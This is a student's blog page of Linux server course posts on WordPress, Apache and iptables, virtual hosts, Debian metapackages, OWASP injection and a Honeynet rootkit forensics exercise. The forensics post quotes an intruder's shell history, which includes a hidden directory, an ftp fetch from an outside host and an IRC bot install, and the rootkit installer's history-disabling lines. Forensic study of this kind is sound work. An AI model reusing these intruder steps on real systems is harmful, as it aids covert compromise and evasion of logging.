Linux as server #6 – WordPress installation and customization

March 9, 2014

This post is part of Tero Karvinen’s course: Linux as server. Even it is related to school mission it will offer usefull information about GNU/Linux!

An another school mission from Mr. Karvinen.

  • Install WordPress
  • Make theme
  • Change theme
  • How to upload images and themes without ssh/ftp access

All tests made with Xubuntu 12.04 LTS Precise Pangolin 32bit.

Hardware:

  • Motherboard: Asus Z87-C
  • CPU: Intel Core i5-4670K 3.40GHz
  • RAM: 8GB DDR3 1600MHz
  • HDD: 120GB SSD Sata 3.0
  • GPU: Geforce GTX 560 Ti Phantom, 2GB GDDR5 (Gainward)
  • Asus cd/dvd

Installation

I have already configured LAMP. What I decided to do first was database for fresh installation. I have used to work with phpmyadmin so I did with that.

First I clicked a Privileges tab and then Add a new user.

Screenshot - 03092014 - 03:19:58 PM

Setup asked user name, host and password. I also checked “Create database with same name and grant all privileges”. After that I Created user.

1

2

Then I checked if the database appeared on phpmy admin.

3

Database done! Then I headed to wordpress.org and resolved the download url.

4

I wanted to install the wordpress to tuukka`s apache userdir so I did this:

$ cd /home/tuukka/public_html/
$ wget http://wordpress.org/latest.tar.gz
$ tar -xf latest.tar.gz
$ ls
5

After copying required files and pre-setups. I did the actual installation.

$ firefox http://localhost/~tuukka/wordpress

Then I followed the first to steps, mostly just clicked next.

6

7

Third page was very important. Setup program asked details of database which I made earlier.

8

Please note that password in this screenshot is different than a password shown earlier. It is because after I took screenshot I accidentally clicked generate password again. So my passwords were the same they differ only in these screenshots!

I got notice “Sorry, but I can’t write the wp-config.php file.”. I did the wp-config.php by copypasting the content and then made the file with nano.

Copypaste the whole box!

$ cd /home/tuukka/public_html/wordpress/
$ nano wp-config.php
Paste the configx -> ctrl+x -> y -> ENTER

Then I ran the install.

10

Last step before install were basic informations about the blog.
11

12

Finally the blog were installed! I tested by pressing Log in and everything worked fine.

13

 

Make theme

I have tried to dodge this for so long. Now it was there again and I decided to face it like a man. I started to do some recearching and I found very nice video from guy called JREAM. Video can be found here. I would highly recommend the video to everyone who would like to start theme from scratch!

First I watched the video couple of times to get the idea. Then I followed it step by step doing everything like JREAM did. Finally I were at the same point were he was at end of the video.

Screen Shot 2014-03-10 at 12.08.18 AM

At this point I was so into the theme making that I totally forgot time. I spent next 24 hours basicly with netbeans and here is result:

Screen Shot 2014-03-09 at 11.58.26 PM

Online demo!

I might explain later more specific details what I did. If you like to learn to make themes right now: watch the video!

Change theme

WordPress theme is package of files which you can just copypaste to any wordpress installation and then go into your Dashboard and activate that theme. Theme which I have just made contains following files:

$ cd bemytheme/
$ ls -a

.   comments.php  functions.php  index.php  sidebar.php  style.css
..  footer.php    header.php     page.php   single.php   style-grey.css

I started by compressing the whole theme folder to .zip file on my mac. After that I used scp to transfer zip to my server. On the server I did following:

$ unzip bemytheme.zip
$ mv bemytheme public_html/wordpress/wp-content

Then I opened my WordPress Dashboard. Went to Appearences -> Themes. I could not saw my theme on the list and started to worry about it. I still had open ssh-connection to my server so I started troubleshooting it.

$ cd public_html/wordpress/wp-content/
$ ls

bemytheme  index.php  plugins  themes

There was my problem. Bemytheme were in wrong directory. It supposed to be in themes. So I moved it.

$ mv bemytheme/ themes/

After that I refressed my Dashboard page on the browser and bemytheme appeared.

themee

I clicked activate and went to site to resolve if theme is working and it is working!

themeee

How to upload images and themes without ssh/ftp access

Alright I got fresh installation of wordpress. I even istalled custom made theme with ssh connection. What if I want to do it without ssh/ftp connection? I started troubleshoots and I found this page.

First I just tried to upload image and theme on WordPress Dashboard and I got these error messages(first is related to image and second to theme on appearance->themes):

upload1

upload2

I already knew that my problem might be solved if I give 777 permissions to wp-content folder but I did not wanted to do that. It would be an unnecessary threat to security. I decided to give ownership of wp-content folder and its content to www-data user.

$ cd
$ cd public_html/wordpress/
$ sudo chown -R www-data wp-content
$ sudo chmod -R 755 wp-content

After that I tried to upload image and theme again in the Dashboard. Process with image went well and I was able to do that. Then I tried to upload theme at Appearance -> Themes:

upload3

I choosed upload, then I browsed theme(http://wordpress.org/themes/radiate) from my hard drive and pressed Install Now. It led me to this page:

upload4

That was obviously something I did not wanted to do. I decided to try an other method which were mentioned on Stackoverflow`s topic. There was comment where user Nadeem Haidar told that he has fixed the problem by adding line to wp-config.php file. Line is this: define(‘FS_METHOD’,’direct’);

$ cd public_html/wordpress/
$ nano wp-config.php
at the bottom of the file I added this:
define(‘FS_METHOD’,’direct’);
ctrl+x -> y -> ENTER

Once more I tried to upload theme at Wordpres Dashboard. It worked perfectly! I did activation and visited the site and new theme was there.

upload6

upload7

 

Sources

Karvinen, Tero: Lessons 2013-03-03, Linux as server

http://stackoverflow.com/questions/640409/can-i-install-update-wordpress-plugins-without-providing-ftp-access

 

Apache installation, log analysis and basic firewall settings

March 6, 2014

greens-beach-196825_640Apache is the most popular HTTP server since 1996. It is used everywhere. I installed Apache, made some log entries, analysed them and finally added some rules with iptables.

Hardware:

  • Motherboard: Asus Z87-C
  • CPU: Intel Core i5-4670K 3.40GHz
  • RAM: 8GB DDR3 1600MHz
  • HDD: 120GB SSD Sata 3.0
  • GPU: Geforce GTX 560 Ti Phantom, 2GB GDDR5 (Gainward)
  • Asus cd/dvd

All tests made with Xubuntu 12.04 LTS Precise Pangolin 32bit using live mode(live cd)

Apache installation

I started by updating package list from default repositories.
$ sudo apt-get update

Apache2 installation and testing
$ sudo apt-get install apache2
$ firefox http://localhost

Firerfox opened page starting with “It works!, This is the default web page for this server.”. I noticed that apache installation was succeeded.

Log entries

By default apache is storing log to: /var/log/apache2

There is thee .log files access.log, error.log and other_vhosts_access.log. I wanted to do entry to error.log. Default user in my live-cd is called xubuntu. I tried to access xubuntus homepage.
$ firefox http://localhost/~xubuntu

That led to the 404 Not Found page so I need to check from error.log what is wrong.
$ less /var/log/apache2/error.log
At the bottom of the error.log was this line:
[Thu Mar 06 13:16:04 2014] [error] [client 127.0.0.1] File does not exist: /var/www/~xubuntu

It told me that apache did not find any files from /var/www/~xubuntu. That is not the place where I want store users homepages.

I decided to enable userdirs.
$ sudo a2enmod userdir
$ sudo service apache2 restart

After that I tried to enter xubuntus homepages again.
$ firefox http://localhost/~xubuntu

Same 404 Not Found page again. Then I checked the logs.
$ less /var/log/apache2/error.log
[Thu Mar 06 13:24:35 2014] [error] [client 127.0.0.1] File does not exist: /home/xubuntu/public_html
It told me that userdirs are now working put there is nothing in that location.

I fixed the problem by making public_html direcotry in to the xubuntus home directory and added file containing some random text.
$ cd
$ mkdir public_html
$ nano index.html

Typed: random text -> ctrl+x -> Y -> ENTER
$ firefox http://localhost/~xubuntu

Finally the 404 page is beated and there is page with “random text”.

Then I oppened apaches acces.log. Time is now 13:32.
$ less /var/log/apache2/access.log
Line at the bottom was
127.0.0.1 – – [06/Mar/2014:13:29:55 +0000] “GET /~xubuntu/ HTTP/1.1” 200 366 “-” “Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0”

What does this means?

/etc/apache2/apache2.conf is the main configuration file. There is section LogFormat where it is specified which information to log and which order. In my case the order was:

LogFormat “%h %l %u %t \”%r\” %>s %O \”%{Referer}i\” \”%{User-Agent}i\”” combined

127.0.0.1: IP addres of the client. This is my own ip since I did the testing with same computer where apache is running. Specificly it is my loopback adapters ip.

– – : Hyphens are there to inform that requested info is not available. Remote logname and Remote user should be dispalyed.

[06/Mar/2014:13:29:55 +0000]: Timestamp

“GET /~xubuntu/ HTTP/1.1”: Request line from the client

” 200 366 “: Status code sent from the server to the client

“-“: Hyphen again. It should get information about the size of the response to the client

“Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0”: Page that linked to this url and user-agent

Iptables

My goal is set firewall to block all inputs except requests to apache. What I needed to do is drop everything except input to port 80.

First I dropped all inputs.
$ sudo iptables -P INPUT DROP

Then added except to accept inputs to port 80.
$ sudo iptables -I INPUT -s 0.0.0.0/0 -p tcp –dport 80 -j ACCEPT

I did test with my macbook pro which is in same network. I started firefox and entered the linux machines ip-addres(10.0.1.11) to url field and pressed enter. Everything worked fine and I was watching apaches default page “It works!”.

Finally I wanted to test is the firewall really working. I installed ssh server and tried to take ssh connection from my macbook.

I removed firewall rules and installed openssh-server.
$ sudo iptables -P INPUT ACCEPT
$ sudo iptables -F
$ sudo apt-get install openssh-server

Then on mac I did connection.
$ ssh xubuntu@10.0.1.11
$ exit
It worked fine.

After test I re-added the firewall rules.
$ sudo iptables -P INPUT DROP
$ sudo iptables -I INPUT -s 0.0.0.0/0 -p tcp –dport 80 -j ACCEPT

Then again on mac I tried to do ssh connection.
$ ssh xubuntu@10.0.1.11
No answer!

Now I am pretty sure that firewall is working. Atleast port 22 is blocked! :p

Sources:

Karvinen, Tero: Lessons 2013-03-03, Linux as server

Merilinna, Juhani: Lessons 2013-02-28, Linux basics

http://httpd.apache.org/docs/1.3/logs.html

http://stackoverflow.com/questions/9234699/understanding-apache-access-log

http://en.wikipedia.org/wiki/Apache_HTTP_Server

3D printed record aka. vinyl!

March 1, 2014

During studying I am doing dj gigs at weekends. I saw this video where  3d-printed vinyl is really working. This is something which is going to blow up the bank! It is the way to integrate new and old-school.

Nowadays its easy to buy music from online stores in your favourite audio format. In future it is possible to do it + print it to vinyl and get back to old school style djing. THIS IS COOL!

At the moment decent 3d-printer cost about 1500 euros and prices are expected to go down soon. There is many manufactures I am now going to mention just one which I know is good and costs ~1500: http://www.minifactory.fi/en/

You can see full article here: http://www.instructables.com/id/3D-Printed-Record/

Usefull linux/unix terminal tools by Kristof Kovacs

March 1, 2014

I was doing my regular Internet surfing and I ended to Hacker News. Always if there is something which points to Linux/unix it gets my attention. At this time it was Kristof Kovacs little collection of usefull terminal tools. I bet there is something for everyone!

http://kkovacs.eu/cool-but-obscure-unix-tools/

tux-36010_640

Linux as server #5 – VPS and virtual hosts

February 27, 2014

This post is part of Tero Karvinen’s course: Linux as server. Even it is related to school mission it will offer usefull information about GNU/Linux!

VPS (Virtual private server) is virtual machine where you can do anything you like,  not anything but almost. You get slot from server where you can install operating system and you get full acces to it. For example if you choose to install Ubuntu to your VPS you are able to sudo.

If you have multiple domains like I have. You might end to point where you like to route them to same server. Virtual hosts makes it possible to point different domains to different directory in the server. For example deejayrakfield.com and tuukkamerilainen.com domains are pointing to same server put different directory.

Mission

Fifth lesson of Tero Karvinen`s Linux as a server course is passed and we are about to:

  • Register and configure VPS
  • Try virtual hosts

VPS (Virtual private server)

I have already done this section by hosting my own websites on VPS. I decide to rent VPS from linode. 20$ per month and I am able to run my very own server. After I realised how cheap and easy it is to rent VPS I have no intrests to have real hardware. Those days are gone.

My linodes specs:

  • 1GB RAM
  • 8 Processors (1x priority)
  • 48GB Storage
  • 2TB Transfer
  • Cost: 20$
  • Ubuntu 12.04 LTS 64bit

Transfer and cost is per month.

Virtual hosts

I followed linodes documentation. Before starting virtual host configurations I have already registered domain(tuukkamerilainen.com), made changes to zone files, and added dns records on Linodes DNS manager.

I started by doing new configuration to /etc/apache2/sites-available/

sudo nano /etc/apache2/sites-available/tuukkamerilainen.com.conf

# domain: example.com
# public: /home/example_user/public/example.com/

<VirtualHost *:80>
  # Admin email, Server Name (domain name), and any aliases
  ServerAdmin webmaster@example.com
  ServerName  www.example.com
  ServerAlias example.com

  # Index file and Document Root (where the public files are located)
  DirectoryIndex index.html index.php
  DocumentRoot /home/example_user/public/example.com/public

  # Log file locations
  LogLevel warn
  ErrorLog  /home/example_user/public/example.com/log/error.log
  CustomLog /home/example_user/public/example.com/log/access.log combined
</VirtualHost>

 

I am not going to show how my server is configured. Most of all I replaced example.com with my own domain and entered the specific directory where my wordpress contents are.

Config done then I applied them and restarted apache

sudo a2ensite tuukkamerilainen.com.conf

sudo service apache2 restart

Everything is nice and tuukkamerilainen.com works while deejayrakfield.com still returns different site!

Source

https://library.linode.com/hosting-website#sph_configuring-name-based-virtual-hosts

Karvinen, Tero: Lessons 2013-02-24, Linux as server

Happy Hacking day 2014 with Mr. Richard Stallman

February 26, 2014

Happy hacking day 2014 was held 11.2 at Haaga-Helia universitys campus in Pasila. Event gathered lots of IT-people under the same roof. It offered high class information technology to explore such as 3d printing stuff and lots of professionals lectures.

Highlight of the day was Mr. Richard Stallmans lecture about free softwares and GNU license. The Organizers of the event ranked Mr. Stallman as one of the biggest heroes of Internet. His number one piece of work is definitely GNU General Public License and GNU project.

There was 80 minutes slot reseved for Mr. Stallmans speech. Time really ran out fast. In my opinion his speech is one of the best IT-speeches ever.

 The Internet Hall of Fame hero Dr. Richard Stallman

Mr. Stallman entered the room with huge applauses. It was the moment which everyone has waited the most. He started by requesting from everyone who were taking photos to not upload them into facebook. After social media criticism he required every video taken during his speech must be published in free video format such as .ogg.

Topic of the speech was fully focused on introducing GNU license and history of open source and free software. For me the Mr. Stallmans speech teached a lot. I realised that I am totally misunderstood the whole thing. I was thinking that open source and free software are kinda same thing. But they definitely are not. Open source programs source code can be free to explore, but if you like to make changes and use the customized version of software you can not do it. With free softwares you can do anything you like, not just explore the code of it.

Some examples:

Open source softwares

  • Android
  • Ubuntu

Free softwares

  • Mozilla firefox
  • VLC Mediaplayer
  • WordPress
  • gNewSense, a GNU/Linux

Nearly at the end of speech Mr. Stallman auctioned stuffed animal. It was funny moment but might not pass all finnish laws. He reserved some thime for questions and one question was “How do I suppose to pay my bills if I am not allowed to code anything else than free softwares?”. Mr. Stallman answered like this: “In my opinion nobody should code anything not free for money, go and get day job and do coding on your free time at home.”

Big brother of the world, does it exist?

Mr. Stallman heavily underlined: If you are using free software you can be more sure that there is no rootkit or malware included in software. But if you are using software like Windows or Ubuntu you can be damn sure that somebody is watching you. I totally agree.

Videos of the speech here.

 

Changing the language // Kielen vaihto

February 24, 2014

I started this blog about one month ago for reporting school school missions. After couple of posts I realised it’s actually quite fun to write blog. Not just fun. It is pure way for learning and when you need to remember something from the past you have place where check it.

Now I am ready to move to a next level. As I am a finnish person. It is how to write a blog in english. Next mission will be posted to blog only in english. We’ll see how it goes. ^_^

Aloitin blogin noin kuukausi sitten pääasiassa koulutehtävien raportoimiseksi. Muutaman postauksen jälkeen tajusin blogin pitämisen olevan todella hauskaa. Eikä pelkästään vain hauskaa. Se on oivallinen tapa oppia ja paikka johon palata muistelemaan miten asian olen ratkaissut aiemmin.

Olen nyt valmis siirtymään seuraavalle tasolle. Tässä kohtaa se tarkoittaa blogiin kirjoittamista englanniksi. Seuraavan postauksen kirjoitan ainoastaan englanniksi. Nähtäväksi jää millainen on lopputulos. ^_^

Linux palvelimena #4 – Metapakettien ihanuutta

February 23, 2014

Linuxin vahvuuksista puhuttaessa metapaketit ponnahtavat usein esiin. Niiden tarkoituksena on helpottaa ohjelmien asennusta. Käytännössä luot paketin joka sisältää tiedot ohjelmista jotka haluat järjestelmään. Voit asentaa sillä haluamasi määrän ohjelmia automatisoidusti.

Saimme Linux palvelimena kurssilla seuraavanlaisen tehtävän:

  • Tee metapaketti, joka asentaa suosikkiohjelmasi. Katso, että se menee läpi lintianista.
  • Tee pakettivarasto repreprolla
  • Paketoi jokin skriptisi, niin että paketti asentaa järjestelmän käyttäjille uuden käskyn

Käytän tehtävässä aiemmista tehtävistä tutuksi tulluttu laitteistoa ja Xubuntu 12.04 Precise Pangolin 32bit käyttöjärjestelmää.

Metapaketti

Tero karvinen on koonnut loistavan oppaan metapaketin luontiin. Siinä paketin luomiseen käytetään equivis ohjelmaa ja gdebiä paketin asentamiseen. Loin omani seuraavasti:

sudo apt-get update
sudo apt-get install equivs
equivs-control tuukkas-funnypack.cfg
nano tuukkas-funnypack.cfg

Tässä vaiheessa tuukkas-funnypack.cfg oli auki nano editorissa ja muokkasin sen sisällön seuraavanlaiseksi:

### Commented entries have reasonable defaults.
### Uncomment to edit them.
# Source: <source package name; defaults to package name>
Section: misc
Priority: optional
# Homepage: <enter URL here; no default>
Standards-Version: 3.9.2

Package: tuukkas-funnypack
Version: 0.1
# Maintainer: Your Name <yourname@example.com>
# Pre-Depends: <comma-separated list of packages>
Depends: sl, cowsay, fortune
# Recommends: <comma-separated list of packages>
# Suggests: <comma-separated list of packages>
# Provides: <comma-separated list of packages>
# Replaces: <comma-separated list of packages>
# Architecture: all
# Copyright: <copyright file; defaults to GPL2>
# Changelog: <changelog file; defaults to a generic changelog>
# Readme: <README.Debian file; defaults to a generic one>
# Extra-Files: <comma-separated list of additional files for the doc directory>
# Files: <pair of space-separated paths; First is file to include, second is destination>
#  <more pairs, if there's more than one file to include. Notice the starting space>
Description:
 This package contains all you need the most
 .
 It maintains to keep you shape when you are not
 .
 You should try to type sl or fortune -s | cowsay

Paketissa asennetaan siis ohjelmat sl, cowsay ja fortune. Seuraavaksi kasataan paketti:

equivs-build tuukkas-funnypack.cfg

Equivs loi paketin ongelmitta ja paketti ilmestyi kansioon jossa sillä hetkellä olin nimellä tuukkas-funnypack_0.1_all.deb.

Järjestelmässäni ei oletuksena ollut gdebi ohjelmaa joten asensin sen.

sudo apt-get install gdebi

Tämän jälkeen asensin metapaketin.

sudo gdebi -n tuukkas-funnypack_0.1_all.deb

Asennus onnistui ongelmitta ja testasin asennetut ohjelmat.

sl
fortune
fortune -s | cowsay

Totesin hupipaketin toimivan.

Seuraavaksi asensin lintianin ja testasin paketin.

sudo apt-get install lintian
lintian -c tuukkas-funnypack_0.1_all.deb

Lintian tulosti ilmoituksen:

E: tuukkas-funnypack: description-synopsis-is-empty

Muokkasin tuukkas-funnypack.cfg tiedoston Description kohtaa ja lisäsin ensimmäiselle riville sanan Info:. Lisäksi muutin version 0.1 -> 0.2.

Description: Info:
 This package contains all you need the most
 .
 It maintains to keep you shape when you are not
 .
 You should try to type sl or fortune -s | cowsay

Suoritin paketin teon ja testauksen uudelleen.

equivs-build tuukkas-funnypack.cfg
lintian -c tuukkas-funnypack_0.2_all.deb
lintian tuukkas-funnypack_0.2_all.deb

Ei virheilmoituksia ja totesin paketin täysin toimivaksi.

Pakettivaraston konfigurointi

Hupipaketin kasauksen jälkeen se piti saada omaan pakettivarastoon. Seurasin jälleen Tero Karvisen opasta aiheesta.

Pakettivarasto vaati toimivan apachen käyttäjien kotisivut hyväksyttyinä. Omassa järjestelmässäni tämä oli jo valmiina.

Loin kansion kotihakemistossani sijaitsevaan public_html kansioon, jonka sisällön apache jakaa.

cd
cd public_html
mkdir -p repository/conf

Tämän jälkeen lisäsin conf kansioon konfigurointi tiedoston.

nano repository/conf/distributions

Codename: lucid Components: main Suite: lucid Architectures: i386 amd64 source

Pakettivarasto on nyt valmis ja odottaa paketteja. Lisäsin hupipakettini.

reprepro -VVVV -b repository/ includedeb lucid tuukkas-funnypack_0.2_all.deb

Reprepro loi repository-kansioon kansiota ja sisältöä seuraavasti:

tuukka@tuukka-xubuntu:~/public_html/repository$ ls
conf  db  dists  pool

Pakettivaraston testaus

Päätin testata hupipaketin asennusta samalla koneella jolla loin pakettivaraston.

Linkkasin pakettivaraston järjestelmään

sudo nano /etc/apt/sources.list.d/repository.list

deb http://localhost/~tuukka/repository lucid main

Tämän jälkeen testasin toimivuuden.

sudo apt-get update
sudo apt-get install tuukkas-funnypack

Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following extra packages will be installed:
  cowsay fortune-mod fortunes-min librecode0 sl
Suggested packages:
  filters fortunes
The following NEW packages will be installed
  cowsay fortune-mod fortunes-min librecode0 sl tuukkas-funnypack
0 to upgrade, 6 to newly install, 0 to remove and 6 not to upgrade.
Need to get 877 kB of archives.
After this operation, 2,212 kB of additional disk space will be used.
Do you want to continue [Y/n]? Y
WARNING: The following packages cannot be authenticated!
  tuukkas-funnypack
Install these packages without verification [y/N]? y

Sain edellä olevan ilmoituksen ja hieman ihmettelin varmenteen puuttumista. Asennus kuitenkin onnistui ja paketin kaikki ohjelmat toimivat normaalisti.

tuukka@tuukka-xubuntu:~/public_html$ fortune | cowsay
 ______________________________________
/ Q: How many marketing people does it 
| take to change a light bulb? A: I'll |
 have to get back to you on that.     /
 --------------------------------------
           ^__^
           (oo)_______
            (__)       )/
                ||----w |
                ||     ||

Bash skriptin paketointi

Olen usein törmännyt ärsyttävään puutteeseen kalentereissa. Viikon numero on asia joka usein jätetään kertomatta. Päätin siis tehdä skriptin joka näyttää kalenterin viikko numeroilla.

Ohjelma ncal oli jo entuudestaan tuttu. Selasin hieman manuaalia ja löysin ratkaisun ongelmaani. Optio -w lisää kalenteriin viikko numerot. Uskon jatkossa muistavani tämän ilman skriptiäkin, mutta päätin silti tehdä homman loppuun.

Luodaan bash skripti

nano kalenteri

#!/bin/bash

ncal -w

Lisätään suoritusoikeus ja testataan

chmod 700 kalenteri
./kalenteri

tuukka@tuukka-xubuntu:~/public_html$ ./kalenteri
    February 2014     
Su     2  9 16 23   
Mo     3 10 17 24   
Tu     4 11 18 25   
We     5 12 19 26   
Th     6 13 20 27   
Fr     7 14 21 28   
Sa  1  8 15 22      
    4  5  6  7  8

Hienosti toimi!

Päätin lisätä skriptin osaksi jo aiemmin luomaani pakettia tuukkas-funnypack.

nano tuukkas-funnypack.cfg

Muokkasin tiedostosta versionumeroa 0.2 -> 0.3 ja files rivin seuraavasti:

Files: kalenteri /usr/local/bin/

Rivillä ensimmäinen osa(kalenteri) kertoo sisällytettävän tiedoston nimen joka sijaitsee tuukkas-funnypack.cfg tiedoston kanssa samassa kansiossa. Toinen osa(/usr/local/bin/) määrittää paikan johon paketti sijoittaa järjestelmässä johon paketti asennetaan. HUOM! kaikki kyseiseen kansioon sisällytetyt skriptit toimivat yleensä kaikilla käyttäjillä. Asian voi tarkastaa ajamalla $PATH – joka näyttää paikat joista ohjelmia etsitään.

Paketoin uuden version ja testasin toimivuuden

equivs-build tuukkas-funnypack.cfg
sudo gdebi -n tuukkas-funnypack_0.3_all.deb

Asennus meni läpi ongelmitta ja testasin asentuiko skripti.

tuukka@tuukka-xubuntu:~/public_html$ kalenteri
    February 2014     
Su     2  9 16 23   
Mo     3 10 17 24   
Tu     4 11 18 25   
We     5 12 19 26   
Th     6 13 20 27   
Fr     7 14 21 28   
Sa  1  8 15 22      
    4  5  6  7  8

Toimii tuukka käyttäjällä. Luodaan uusi käyttäjä mrhox ja kokeillaan uudestaan.

sudo adduser mrhox…
su mrhox

mrhox@tuukka-xubuntu:~$ kalenteri
    February 2014     
Su     2  9 16 23   
Mo     3 10 17 24   
Tu     4 11 18 25   
We     5 12 19 26   
Th     6 13 20 27   
Fr     7 14 21 28   
Sa  1  8 15 22      
    4  5  6  7  8

Skripti toimii!

Lähteet

http://terokarvinen.com/2011/create-deb-metapackage-in-5-minutes
http://terokarvinen.com/2011/update-all-your-computers-with-a-deb-repository

Karvinen, Tero: Oppitunnit 2013-02-10, Linux palvelimena -kurssi

OWASP Top 10 – Number one, Injection

February 10, 2014

Open Wep Application Security Project eli OWASP on kansainvälinen voittoatavoittelematon yhteisö jonka tarkoituksena on jakaa tietoa ja kehittää ohjelmistojen tietoturvaa.

Yhteisö julkaisee kolmen vuoden välein Top10 listan merkittävimmistä ja hyväksi käytetyimmistä tietoturvariskeistä. Vuonna 2013 julkaistun listan ensimmäiseltä sijalta löytyy: Injection (Injektio).

Pähkinänkuoressa

Käyttäjä syöttää tietoa(esimerkiksi SQL lauseen) lomakkeeseen tai web-sivulle, joka on yhteydessä tietokantaan. Mikäli ohjelmisto on koodattu huolimattomasti, käyttäjän suorittama komento palauttaa arkaluontoista tietoa tai vahingoittaa/muokkaa  tietokannan sisältöä. Pahimmillaan tilanne voi johtaa sivuston/ohjelman valtaukseen.

Miten suojautua?

Ohjelmiston testauksella ei usein havaita ongelmia. Paras tapa on käydä läpi koodia itsessään ja pyrkiä jo ohjelmointi vaiheessa huomioimaan riskit. Ei toivotuilla vierailla on usein käytössään botteja, jotka etsivät haavoittuvaisia ohjelmia.

Miksi suojautua?

Imagon ja sopimusten kannalta tietojen menetys, muokkaantuminen tai vääriin käsiin joutuminen voi olla hyvin harmillista.

Lähteet
https://www.owasp.org/index.php/Top_10_2013-Top_10

Linux palvelimena #3 – scan of the month 15

February 9, 2014

“You have downloaded the / partition of a compromised 6.2 Linux box. Your mission is to recover the deleted rootkit from the / partition.” – scan of the month 15

Tehtävänä on siis tarkastella murtaudutun Linuxin levykuvaa ja havaita rootkit.

Levykuvan kanssa työskentely

Latasin haasteen aikaisemmissakin harjoituksissa käyttämääni ympäristöön ja purin pakatut tiedostot.

cd
mkdir scan15
cd scan15
wget http://old.honeynet.org/scans/scan15/honeynet.tar.gz
tar -xf honeynet.tar.gz

Paketista kuoriutui honeynet kansio jonka sisältä löytyivät tiedostot honeypot.hda8.dd ja README. Luin käskystä ja törmäsin lähes samaan informaatioon kuin scan of the monthin nettisivuilla. Jatkoin .dd tiedoston pariin Tero Karvisen oppaan avulla.

mkdir allocated deleted
tsk_recover -a honeynet.hda8.dd allocated/

Tässä kohtaa sain ilmoituksen puuttuvasta ohjelmasta tsk_recover. Lisäksi järjestelmä ilmoitti vinkkinä tsk_recoverin löytyvän sleuthkit paketista, joten asensin sen.

sudo apt-get update
sudo apt-get install sleuthkit

Tämän jälkeen ajoin uudestaan epäonnistuneen komennon.

tsk_recover -a honeynet.hda8.dd allocated/
-> sain ilmoituksen: Files Recovered: 1614
tsk_recover honeynet.hda8.dd deleted/
-> sain ilmoituksen: Files Recovered: 37

Siirryin tarkastelemaan tiedostoja. En havainnut juuri mitään erikoista. Käytin aikaa seikkailuun ja tutkimiseen, mutta en oikein saanut mistään otetta ja pää oli varsin tyhjä ideoista. Yritin etsiä tiedostoja joita on muokattu 14,15 tai 16.3.2001.

find /home/tuukka/scan15/honeynet/allocated/ -newermt “2001-03-14”
find /home/tuukka/scan15/honeynet/allocated/ -newermt “2001-03-15”
find /home/tuukka/scan15/honeynet/allocated/ -newermt “2001-03-16”

Kaikki komennot tuottivat saman oloisen listan ja putkitin komennot: wc -l ja sain jokaisesta vastaukseksi 1684. Eli tiedostoja oli jokaisella hakutuloksella saman verran.

Päätin kokeilla aikajanan tekoa kaikista tiedostoista.

tsk_gettimes honeypot.hda8.dd >rawtimes
mactime -b rawtimes|less

Sain oikein upean puumallisen tulosteen. Kävi ilmi, että 15.3.2001 oli tosiaan muokattu vähän sitä sun tätä. Merkintöjä oli todella paljon. Olin aivan umpikujassa enkä keksinyt miten jatkaa. Päädyin hieman vilkaisemaan Janne Kuuselan blogia. Katsoin alun hänen tehtävän ratkaisustaan, jossa hän oli mountannut levykuvan ja sen jälkeen mainittiin jotain rootista. Suljin blogin nopeasti, kun tajusin etten ollut suorittanut mounttausta ollenkaan.

mkdir sda1
sudo mount -o “loop,nodev,noexec,ro” honeypot.hda8.dd sda1/
cd sda1

Kansio näytti varsin mielenkiintoiselta ja heti ensimmäisenä päätin kokeilla root kansioon siirtymistä.

cd root/
-> bash: cd: root/: Permission denied
sudo cd root/
-> sudo: cd: command not found

Googletin ongelmaa hetken ja sain ohjeeksi ajaa komennon sudo su.

sudo su
cd root

Pääsin kansioon sisään. ls listaus näytti tyhjää sisältöä. ls -a paljasti joukon piilotiedostoja joita rupesin tutkimaan. Suoritin komennon ls -al ja paljastui, että .bash_history tiedostoa on viimeksi muokattu 16.3.2001. Varsin epäilyttävää.

exec tcsh
ls
mkdir /var/...
ls
cd /var/...
ftp ftp.home.ro
tar -zxvf emech-2.8.tar.gz
cd emech-2.8
./configure
y
make
make
make install
mv sample.set mech.set
pico mech.set
./mech
cd /etc
pico ftpaccess
ls
exit

emech-2.8 lähdekoodi on selvästikkin ladattu ja ohjelma on asennettu. Muuta en osannut päätellä. Tähän mennessä olin jo aivan sekaisin ja poukkoulin edestakaisin selaten ja etsien kaikkea. En keksinyt mitään järkevää. Päädyin katsomaan ratkaisun Janne Kuuselan blogista.

Ratkaisu

Heti ratkaisun nähtyäni rupesi armottomasti harmittamaan! Olin useaan otteeseen katsonut poistetut tiedostot läpi, mutta jostain ihmeen syystä en ollut kiinnittänyt huomiota oleellisimpaan lk.tgz tiedostoon.

On päivänselvää järjestelmässä olleen rootkit.

Puretun tiedoston sisältä löytyneessä install tiedoston ensimmäiset rivit:

#!/bin/sh
 clear
 unset HISTFILE
 echo    “********* Instalarea Rootkitului A Pornit La Drum *********”
 echo    “********* Mircea SUGI PULA ********************************”
 echo    “********* Multumiri La Toti Care M-Au Ajutat **************”
 echo    “********* Lemme Give You A Tip : **************************”
 echo    “********* Ignore everything, call your freedom ************”
 echo    “********* Scream & swear as much as you can ***************”
 echo    “********* Cuz anyway nobody will hear you and no one will *”
 echo    “********* Care about you **********************************”
 echo
 echo
 chown root.root *

Tutkiskelin vielä tiedostoja joita Janne Kuusela ei ollut blogissaan huomioinut. Löysin ssh aiheisia tiedostoja: ssh_config, sshd_config, ssh_host_key, ssh_host_key.pub, ssh_random_speed. Erityisesti kiinnitin huomiota ssh_host_key.pub tiedostoon, joka viittaisi rootkitin asentajan vaihtaneen ssh avainparin. Tämän jälkeen hänellä on ollut ssh yhteys koneeseen.

Lähteet

http://jtkuusela.wordpress.com/2013/09/18/linux-palvelimena-ict4tn003-9-ja-10-syksylla-2013-kotitehtava-h3-ratkaise-scan-of-the-month-15-kasittele-haitallisia-ohjelmia-turvallisesti/
http://terokarvinen.com/2013/forensic-file-recovery-with-linux
Karvinen, Tero: Oppitunnit 2013-02-03, Linux palvelimena -kurssi

Linux palvelimena #2 – kuormitus ja analysointi

January 30, 2014

Tehtävä:

  • Kerää kuormitustietoja munin -ohjelmalla
  • Kuormita konetta stress:llä
  • Käytä tunnilla käytyjä työkaluja arvioidaksesi kuormitusta: cpu, mem, io…
  • Lopuksi analysoi munin keräämiä käyriä
  • Aiheuta valitsemaasi lokiin muutamia rivejä ja analysoi niistä 2-3 riviä perusteellisesti

Ennakkotiedot

